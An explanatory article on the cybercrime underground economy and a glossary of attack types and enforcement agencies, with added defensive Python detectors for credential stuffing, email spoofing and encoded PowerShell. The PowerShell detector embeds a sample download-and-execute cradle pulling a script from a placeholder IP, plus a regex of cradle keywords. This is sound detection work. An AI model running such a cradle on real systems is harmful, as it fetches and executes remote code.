
Cybercrime: The Underground Economy


The success of any industry is reliant on its economics – the production, allocation and use of its goods and services. Cybercrime is no different, maintaining its own economy of commoditized products and services.


Products

The cybercrime economy’s products, like any other industry’s offerings, benefit both sellers and buyers. Sellers benefit from a quick and discreet payout; buyers get “out of the box” malicious capabilities they can deploy immediately. These products fall into two main groups: information and resources.

Information includes commodities such as:

  • Stolen personally identifiable information (PII): This includes everything from mass email lists used by spammers to full identity theft packages to commit financial fraud.
  • Exfiltrated organizational information: This includes intellectual capital/property, nonpublic internal data and internal operational details.
  • Harvested authentication credentials: Stolen username and password combinations remain a significant risk, especially when the same credentials are reused across multiple sites, because a single breach then unlocks every other account where they were reused (credential stuffing).
  • Pilfered financial data: Card numbers and account details that enable unauthorized withdrawals from accounts or charges against credit lines, which continue to plague account holders.

Resources include such elements as:

  • Access to feature-rich malware: Malware of varying capabilities (e.g., information stealers, remote administration tools (RATs), ransomware, purpose-built utilities) that delivers consistent results and whose source code has not leaked can generate significant revenue for its authors and distributors.
  • Purchase of system or software exploits: While many white hats elect to support bug bounty initiatives by vendors, there remains a lucrative underground market for reliable, unpatched exploits.
  • Transfer of control for previously compromised machines: This usually applies to always-on servers, which can then be used as attack platforms or sold for the information they store.
  • Malicious actor training: Training is offered through guidebooks or tutorials on effective tool usage and specific tactics, techniques and procedures (TTPs).


Services

The services offered within the cybercrime economy use a leasing structure, where access to a product is promised at a set rate for a fixed period. Sellers benefit from a guaranteed recurring revenue stream, and buyers benefit from the continued availability and upkeep of malicious tools.

These services include offerings such as:

  • Distributed denial of service (DDoS): Botnet-powered attacks, sold on demand, that degrade the availability of targeted servers and applications.
  • Exploit kits (EKs): Typically leased at a monthly rate, giving the buyer access to the exploit toolkit while letting them supply their own final payload.
  • Infrastructure rental: These include hosting services for attack platforms, malware updates, configuration, command and control (C2), and other attack lifecycle functions.
  • Money laundering: The transfer of illegally obtained funds (“money muling”) through accounts and mechanisms in money-haven countries remains a key service.


Cybercrime FAQs

Cybercrime refers to any criminal activity that targets or uses computers, networks, or cloud infrastructure to commit fraud, disrupt operations, steal data, or extort victims. Techniques include phishing, ransomware deployment, credential theft, and cloud abuse. Threat actors range from financially motivated syndicates to state-backed offensive teams.
Cyber extortion uses digital threats — such as ransomware, data leaks, or DDoS attacks — to coerce victims into paying a ransom. Attackers may encrypt data, exfiltrate sensitive files, or threaten reputational damage. In cloud environments, extortion increasingly targets storage buckets, backups, and SaaS collaboration platforms.
Cyberstalking involves persistent, unwanted surveillance or harassment through digital channels. Attackers use social media, messaging platforms, and location tracking to intimidate or monitor victims. In corporate settings, cyberstalking may escalate into insider threats, data leaks, or reputational attacks coordinated through anonymous or pseudonymous accounts.
Carding is the trafficking and use of stolen credit card data for unauthorized transactions. Cybercriminals test cards against merchant sites, automate purchase attempts, and launder funds through synthetic identities. Carding forums on the dark web often facilitate bulk sales of compromised payment credentials harvested from breaches or phishing.
The dark web is the part of the internet reachable only through anonymizing overlay networks such as Tor. It hosts marketplaces for stolen credentials, malware, and attack infrastructure. Threat actors use it to share breach data, coordinate ransomware campaigns, and advertise access to compromised cloud environments.
A botnet is a network of compromised devices controlled by an attacker to execute coordinated tasks. Bots may run DDoS attacks, send spam, mine cryptocurrency, or brute force credentials. Cloud-hosted VMs, unsecured IoT devices, and misconfigured containers are often recruited into botnets without detection.
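The credential reuse risk noted under Information above and the credential brute-forcing that botnets perform both leave the same trace in authentication logs: one source trying many different accounts in a short window, rather than one user retrying their own password. The following is an added example, not code from the original page or from Unit 42, of that detection logic run over a few constructed auth log lines; the log format, field names, window and threshold are assumptions chosen for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample authentication log (not from any real system). One source
# address, 203.0.113.7, tries seven different accounts in five seconds and gets
# one hit; 198.51.100.4 is a user mistyping their own password.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z auth ip=203.0.113.7 user=alice result=FAIL
2024-05-01T10:00:02Z auth ip=203.0.113.7 user=bob result=FAIL
2024-05-01T10:00:02Z auth ip=203.0.113.7 user=carol result=FAIL
2024-05-01T10:00:03Z auth ip=203.0.113.7 user=dave result=FAIL
2024-05-01T10:00:03Z auth ip=203.0.113.7 user=erin result=FAIL
2024-05-01T10:00:04Z auth ip=203.0.113.7 user=frank result=SUCCESS
2024-05-01T10:00:05Z auth ip=203.0.113.7 user=grace result=FAIL
2024-05-01T10:00:10Z auth ip=198.51.100.4 user=alice result=FAIL
2024-05-01T10:00:20Z auth ip=198.51.100.4 user=alice result=FAIL
2024-05-01T10:00:30Z auth ip=198.51.100.4 user=alice result=SUCCESS
2024-05-01T10:05:00Z auth ip=192.0.2.9 user=henry result=SUCCESS
"""

# Assumed log layout; adapt the pattern to the real sshd / IdP / WAF format.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>FAIL|SUCCESS)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def detect_credential_stuffing(log_text, window=timedelta(seconds=60), min_distinct_users=5):
    """Return {ip: sorted distinct usernames} for every source IP that attempted
    at least `min_distinct_users` different accounts inside any `window`-long span.

    Many distinct usernames from one source in a short window is the signature of
    a replayed leak (credential stuffing); a legitimate user retrying their own
    password produces one username and a handful of attempts.
    """
    attempts = defaultdict(list)  # ip -> [(timestamp, username), ...]
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            attempts[ev["ip"]].append((ev["ts"], ev["user"]))

    flagged = {}
    for ip, evs in attempts.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans at most `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            if len({user for _, user in evs[start:end + 1]}) >= min_distinct_users:
                flagged[ip] = sorted({user for _, user in evs})
                break
    return flagged


def compromised_accounts(log_text, flagged):
    """Usernames that authenticated successfully from a flagged source: those
    credentials were valid in the leak, so reset them and revoke their sessions."""
    hits = set()
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["ip"] in flagged and ev["result"] == "SUCCESS":
            hits.add(ev["user"])
    return sorted(hits)


if __name__ == "__main__":
    flagged = detect_credential_stuffing(SAMPLE_LOG)
    for ip, users in flagged.items():
        print(f"{ip}: {len(users)} distinct accounts attempted")
    print("accounts needing reset:", compromised_accounts(SAMPLE_LOG, flagged))
```

The threshold of five distinct accounts in a minute is deliberately low for the sample; in production, tune it per endpoint, and note that a distributed botnet spreads attempts across many source addresses, so the same logic should also be keyed on the target account or on a shared fingerprint (user agent, ASN) rather than IP alone.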
A distributed denial-of-service (DDoS) attack overwhelms a service or application with traffic from many sources at once. Attackers flood endpoints, APIs, or DNS with requests, exhausting bandwidth or compute resources. In cloud platforms, DDoS attacks can saturate load balancers, drive up autoscaling costs, or degrade an entire availability zone.
Hacking is the act of exploiting vulnerabilities in systems, software, or human behavior to gain unauthorized access or control. Motivations range from financial gain to activism or espionage. Cloud-focused hacking often targets IAM misconfigurations, exposed APIs, container escapes, or privilege escalation in multi-tenant architectures.
Cyber espionage collects confidential data from governments, enterprises, or critical infrastructure through stealthy network intrusions. Nation-state actors typically use zero-day exploits, custom implants, and long dwell times. Cloud environments are frequent targets due to centralized identity, rich telemetry, and interconnected SaaS supply chains.
A money mule transfers or launders stolen funds on behalf of cybercriminals, often unknowingly. Attackers recruit mules through fake job offers or online scams. Mules receive wire transfers or cryptocurrency and move assets across accounts, obscuring attribution and complicating recovery after cloud-related financial fraud.
Cyberterrorism leverages digital attacks to instill fear, disrupt infrastructure, or advance ideological agendas. Threat actors may target power grids, hospitals, or cloud-hosted public services. Techniques include destructive malware, website defacement, and attacks on critical SaaS platforms that support national security or civic operations.
A zero-day exploit targets a software vulnerability unknown to the vendor and unpatched at the time of attack. Exploits often deliver remote code execution or privilege escalation. Threat actors weaponize zero-days against browsers, hypervisors, or identity providers in cloud environments to establish initial access or persistence.
Spoofing manipulates identifiers to impersonate a trusted source in digital communication. Attackers forge IP addresses, DNS records, email headers, or caller IDs. In cloud environments, spoofed domains and sender addresses frequently appear in phishing campaigns targeting admin credentials or API tokens.
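As an added example (not code from the original page or from Unit 42), the sender-alignment check a mail gateway applies to catch the spoofed From: addresses described above: it parses the Authentication-Results header and tests whether the SPF- or DKIM-authenticated domain matches the From: domain, the same strict-alignment rule DMARC uses. The two messages are constructed, the domains are assumptions, and the check trusts the Authentication-Results header, so it belongs behind a gateway that strips any such header arriving from outside.

```python
import email
from email.utils import parseaddr

# Two constructed messages (not real captures). In the first, the visible From:
# claims the victim's own domain while the envelope sender and the SPF-checked
# domain belong to attacker infrastructure; in the second everything agrees.
SPOOFED_MSG = """\
Return-Path: <bounce@mail-example.invalid>
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=mail-example.invalid; dkim=none
From: "IT Helpdesk" <helpdesk@example.com>
To: admin@example.com
Subject: Action required: re-enter your cloud console credentials

Please sign in at the link below to keep your access.
"""

LEGIT_MSG = """\
Return-Path: <helpdesk@example.com>
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com; dkim=pass header.d=example.com
From: "IT Helpdesk" <helpdesk@example.com>
To: admin@example.com
Subject: Scheduled maintenance

No action needed.
"""


def _domain(addr):
    """Domain part of an address header value, lower-cased ('' if absent)."""
    mailbox = parseaddr(addr or "")[1]
    return mailbox.rsplit("@", 1)[-1].lower() if "@" in mailbox else ""


def parse_authentication_results(msg):
    """Turn 'authserv; spf=pass smtp.mailfrom=x; dkim=pass header.d=y' into
    {'spf': ('pass', {'smtp.mailfrom': 'x'}), 'dkim': ('pass', {'header.d': 'y'})}."""
    results = {}
    parts = msg.get("Authentication-Results", "").split(";")[1:]  # drop authserv-id
    for part in parts:
        tokens = part.split()
        if not tokens:
            continue
        method, _, result = tokens[0].partition("=")
        props = dict(t.split("=", 1) for t in tokens[1:] if "=" in t)
        results[method.lower()] = (result.lower(), props)
    return results


def assess_spoofing(raw_message):
    """Apply DMARC-style strict alignment: the message is trusted only if SPF or
    DKIM passed *for the same domain* shown in From:. A missing
    Authentication-Results header counts as no authentication at all."""
    msg = email.message_from_string(raw_message)
    from_domain = _domain(msg.get("From"))
    auth = parse_authentication_results(msg)

    spf_result, spf_props = auth.get("spf", ("none", {}))
    dkim_result, dkim_props = auth.get("dkim", ("none", {}))
    spf_domain = spf_props.get("smtp.mailfrom", "").lower()
    dkim_domain = dkim_props.get("header.d", "").lower()

    spf_aligned = spf_result == "pass" and spf_domain == from_domain
    dkim_aligned = dkim_result == "pass" and dkim_domain == from_domain

    findings = []
    if not spf_aligned:
        findings.append(f"SPF not aligned: result={spf_result} mailfrom={spf_domain or '-'} from={from_domain}")
    if not dkim_aligned:
        findings.append(f"DKIM not aligned: result={dkim_result} d={dkim_domain or '-'} from={from_domain}")
    return_path_domain = _domain(msg.get("Return-Path"))
    if return_path_domain and return_path_domain != from_domain:
        findings.append(f"Return-Path domain {return_path_domain} differs from From domain {from_domain}")

    return {
        "from_domain": from_domain,
        "suspicious": not (spf_aligned or dkim_aligned),
        "findings": findings,
    }


if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED_MSG), ("legit", LEGIT_MSG)):
        verdict = assess_spoofing(raw)
        print(label, "->", "SUSPICIOUS" if verdict["suspicious"] else "ok")
        for finding in verdict["findings"]:
            print("   ", finding)
```

Strict alignment is used here on purpose: relaxed alignment (accepting a subdomain of the From: domain) is what DMARC defaults to, but it also accepts mail from any subdomain an attacker can get SPF to pass for, so a gateway protecting admin mailboxes is better off demanding the exact domain. Note that a lookalike domain the attacker actually controls will pass this check; that case needs domain-similarity logic, not authentication results.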
Scareware uses alarming pop-ups or fake alerts to convince users to install malicious software or pay for unnecessary services. Messages often claim the system is infected or compromised. Scareware may lead to malware deployment, credential theft, or further social engineering through support scams.
Malvertising injects malicious code into legitimate ad networks, reaching users through trusted websites. Scripts may redirect users to exploit kits or silently execute mining code. In cloud environments, attackers also target SaaS-based ad platforms to compromise web applications via embedded third-party content.
Spyware covertly collects data from an infected device, including keystrokes, credentials, and browser activity. Cloud-related spyware may intercept MFA codes, exfiltrate session tokens, or monitor administrator behavior. Threat actors use it to maintain stealthy access and pivot deeper into cloud workloads.
A keylogger records keyboard input to capture credentials, sensitive data, or command-line activity. Attackers install keyloggers via phishing, infected software, or malicious browser extensions. In cloud environments, stolen input can yield root credentials, API keys, or secrets used for privilege escalation.
A Trojan horse disguises malicious code as a legitimate application to gain initial access. Once executed, it can install backdoors, deploy spyware, or exfiltrate data. Cloud-related Trojans may impersonate admin tools, SDKs, or remote management utilities targeting developers and infrastructure teams.
A drive-by download occurs when malicious code executes automatically upon visiting a compromised or malicious site. Attackers exploit browser flaws or deliver payloads via hidden iframes and script injections. Victims need not click anything. Drive-by attacks often serve miners, RATs, or credential stealers.
A watering hole attack compromises a website frequented by a target group, injecting malware or exploit code. The goal is to infect visitors from a specific industry or organization. In cloud scenarios, attackers may target developer forums, documentation sites, or SaaS login portals.
Deepfake fraud uses synthetic media — audio or video generated with AI — to impersonate trusted individuals. Attackers spoof executives in real-time calls or pre-recorded videos to authorize wire transfers or release credentials. Cloud collaboration platforms and conferencing tools increase the surface area for deepfake-based social engineering.
Cryptojacking hijacks compute resources to mine cryptocurrency without user consent. Attackers deliver mining code via malware, browser scripts, or compromised containers. In cloud environments, cryptojacking often targets underprotected workloads, misconfigured orchestration platforms, or excessive IAM permissions that allow unauthorized deployment of mining infrastructure.
A remote access trojan (RAT) provides attackers covert, persistent control over a compromised system. It establishes a command-and-control channel, allowing execution of arbitrary commands, file manipulation, screen capture, and credential theft. In cloud environments, RATs often target endpoints with privileged access to internal systems or SaaS consoles.
Crimeware refers to malware explicitly designed to facilitate cybercrime. It includes credential stealers, banking trojans, ransomware, and exploit kits. Toolkits often feature automation, evasion capabilities, and affiliate monetization. Cloud-focused variants target infrastructure credentials, API keys, and access tokens for lateral movement or data exfiltration.
ATM skimming captures data from a bank card’s magnetic stripe and, in many cases, the associated PIN. Attackers install physical skimmers and hidden cameras or use Bluetooth-enabled devices. Collected data enables fraudulent withdrawals or card cloning. The technique rarely intersects with cloud, but the stolen data often fuels cybercrime.
Click fraud generates illegitimate ad clicks to inflate revenue or drain competitors’ ad budgets. Attackers deploy bots, script-based automation, or incentivized human traffic. In cloud infrastructure, adversaries may use compromised virtual machines or containers to scale fraud operations without incurring cost.
DNS hijacking manipulates domain resolution to redirect traffic to malicious or unintended destinations. Attackers may alter records at the registrar or DNS provider, poison resolver caches, or intercept queries via rogue resolvers. Cloud environments are exposed when DNS zones are mismanaged, for example when a record still points at a cloud resource (a storage bucket or load balancer hostname) that has since been released and can be claimed by anyone.
A rootkit hides the presence of malicious software by modifying low-level system components such as the kernel, drivers, or firmware. It enables stealthy persistence, evasion from detection, and privileged control. In virtualized or containerized cloud environments, kernel-level rootkits pose significant risk to shared infrastructure.
Fileless malware operates largely in memory, avoiding file-based detection. It abuses trusted processes and built-in tools such as PowerShell, WMI, or Bash to execute payloads. On cloud-hosted systems, fileless threats lean on living-off-the-land techniques and abuse identity tokens for lateral movement that leaves few artifacts on disk.
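An added example (not from the original page or from Unit 42) of a detection a practitioner would run over process-creation telemetry for the PowerShell abuse described above: it finds the -EncodedCommand argument (and the abbreviated switch forms PowerShell accepts), decodes the UTF-16LE base64 payload, and flags download-and-execute cradles that never touch disk. The events, the field names and the indicator list are constructed assumptions.

```python
import base64
import re


def _encode_for_sample(script):
    """Build a sample -EncodedCommand value the way PowerShell expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation records (not real telemetry). The first is a
# download-and-run cradle; the second is an ordinary scheduled script; the
# third is a benign command launched through WMI with the short -e form.
SAMPLE_EVENTS = [
    {"pid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc "
                + _encode_for_sample("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/a.ps1')")},
    {"pid": 4188,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"pid": 4201,
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic process call create "powershell -e ' + _encode_for_sample("Get-Process") + '"'},
]

# Download / in-memory execution primitives that mark a cradle rather than a
# harmless encoded one-liner. Constructed indicator list; extend it from your own telemetry.
CRADLE_RE = re.compile(
    r"(?i)\b(IEX|Invoke-Expression|DownloadString|DownloadFile|Net\.WebClient|"
    r"Invoke-WebRequest|FromBase64String|Reflection\.Assembly)\b"
)


def extract_encoded_command(cmdline):
    """Return the base64 argument following -EncodedCommand, or None.

    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...),
    so match on prefix rather than the full switch name; -ExecutionPolicy and
    -File are not prefixes of 'encodedcommand' and are correctly ignored.
    """
    tokens = [t.strip("\"'") for t in cmdline.split()]
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith("-") and len(tok) > 1 and "encodedcommand".startswith(tok[1:].lower()):
            return tokens[i + 1]
    return None


def decode_encoded_command(b64):
    """Decode PowerShell's UTF-16LE base64 payload; None if it is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def analyze_event(event):
    """Decode any encoded command in the event and list the cradle primitives it contains."""
    b64 = extract_encoded_command(event["cmdline"])
    decoded = decode_encoded_command(b64) if b64 else None
    indicators = CRADLE_RE.findall(decoded) if decoded else []
    return {"pid": event["pid"], "decoded": decoded, "indicators": indicators}


def triage(events):
    """(pid, severity, indicators) for every event carrying an encoded command:
    'high' when the decoded script contains a cradle primitive, else 'medium'."""
    out = []
    for ev in events:
        r = analyze_event(ev)
        if r["decoded"] is None:
            continue
        out.append((r["pid"], "high" if r["indicators"] else "medium", r["indicators"]))
    return out


if __name__ == "__main__":
    for pid, severity, indicators in triage(SAMPLE_EVENTS):
        print(pid, severity, indicators)
```

Encoded commands are common in legitimate automation, so the decoded script, not the mere presence of the switch, is what separates a true positive from noise; the same decode step is worth applying to Script Block Logging output, where multi-stage loaders reveal the next layer.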
Backdoor access allows unauthorized entry into a system through hidden credentials, hardcoded accounts, or malicious modifications to authentication logic. Attackers use backdoors to maintain persistence or regain access after cleanup. In cloud environments, backdoors may reside in CI/CD pipelines, API gateways, or IaC templates.
Cyberattack infrastructure comprises the technical components that enable malicious campaigns — command-and-control servers, phishing domains, proxy networks, malware loaders, and staging environments. Operators often distribute infrastructure across bulletproof hosts, dynamic DNS, and cloud providers to ensure redundancy, scalability, and evasion of takedown efforts.
Bulletproof hosting provides resilient infrastructure for cybercriminals by ignoring abuse complaints and takedown requests. Providers may host phishing kits, C2 servers, illegal marketplaces, or exploit kits. They operate in jurisdictions with weak enforcement or exploit legal loopholes, shielding operators from law enforcement disruption.
INTERPOL is the International Criminal Police Organization, coordinating cross-border law enforcement among 195 member countries. Its Cybercrime Directorate supports global efforts against ransomware, child exploitation, and fraud. INTERPOL issues notices, runs operations with national agencies, and facilitates intelligence sharing through its secure communications network.
Europol is the European Union Agency for Law Enforcement Cooperation. Its European Cybercrime Centre (EC3) combats online fraud, dark web marketplaces, and large-scale ransomware operations. Europol coordinates international investigations, provides forensic expertise, and partners with industry to dismantle cybercriminal infrastructure across EU member states.
The FBI Cyber Division investigates high-level cyber threats to U.S. national security, critical infrastructure, and financial systems. It leads operations against state-sponsored intrusions, ransomware gangs, and online fraud rings. The division collaborates with private sector partners, intelligence agencies, and global law enforcement via the National Cyber Investigative Joint Task Force.
The US Secret Service investigates cyber-enabled financial crimes, including business email compromise, card fraud, and ransomware. Its Cyber Fraud Task Forces combine law enforcement, private sector, and intelligence resources. The agency also runs digital forensics labs and supports international takedowns of cybercrime infrastructure.
The Cybersecurity and Infrastructure Security Agency (CISA) leads U.S. efforts to secure federal networks and critical infrastructure. CISA publishes threat advisories, coordinates incident response, and operates vulnerability disclosure programs. It supports cloud resilience through Secure Cloud Business Applications guidance and sector-specific risk mitigation strategies.
The UK’s National Cyber Security Centre (NCSC) provides threat intelligence, incident response, and best practices to defend public and private sector systems. It publishes advisories on cloud hardening, zero trust, and secure software development. NCSC also partners with international allies to combat large-scale cyber threats.
The US Department of Justice (DOJ) prosecutes cybercrime and enforces federal cybersecurity laws. It leads indictments against ransomware groups, espionage actors, and fraud syndicates. DOJ's Computer Crime and Intellectual Property Section (CCIPS) collaborates with FBI and international agencies to dismantle cybercriminal networks and recover stolen assets.
The Internet Crime Complaint Center (IC3) is the FBI’s central platform for collecting reports of internet-enabled crime. IC3 aggregates data from individuals and businesses, issues public alerts, and supports investigations. It plays a key role in identifying BEC trends, coordinating takedowns, and tracking financial fraud schemes.
The UK’s National Crime Agency (NCA) targets serious and organized crime, including cyber operations. Its National Cyber Crime Unit disrupts ransomware groups, dark web vendors, and credential fraud rings. The NCA collaborates with Europol, FBI, and industry partners to run offensive cyber operations and intelligence collection.
A Computer Emergency Response Team (CERT) provides coordinated incident response and cybersecurity guidance for a specific organization, sector, or nation. CERTs investigate breaches, distribute vulnerability alerts, and issue indicators of compromise. In cloud-focused events, CERTs often assist with cross-platform forensics and containment strategy.
US Cyber Command (USCYBERCOM) conducts defensive and offensive cyberspace operations to protect national interests. It defends DoD networks, counters advanced persistent threats, and executes strategic deterrence missions. Cyber Command works closely with NSA and supports cloud infrastructure resilience during campaigns against state-sponsored cyber actors.
Cyber police refer to national or regional law enforcement units specializing in digital crime. These agencies investigate data breaches, fraud, malware distribution, and cyberstalking. In many countries, cyber police operate under interior ministries or national security agencies, often collaborating with private cloud providers for evidence gathering.
The Federal Trade Commission (FTC) enforces consumer protection laws and privacy regulations in the U.S. It investigates data breaches, deceptive security practices, and privacy violations. The FTC can impose penalties, mandate security controls, and enforce cloud vendor compliance with data handling and breach notification rules.
A data protection authority (DPA) enforces privacy laws such as GDPR, CCPA, or PIPEDA within its jurisdiction. DPAs audit data controllers, investigate cloud misconfigurations, and sanction non-compliance. They also provide guidance on encryption, retention, and cross-border transfers of data in multi-tenant cloud environments.
The Financial Crimes Enforcement Network (FinCEN) monitors financial systems for illicit activity, including cybercrime proceeds. It collects and analyzes suspicious activity reports, enforces AML regulations, and tracks ransomware-related laundering through crypto exchanges. FinCEN collaborates with law enforcement and cloud-based fintechs to disrupt digital money laundering.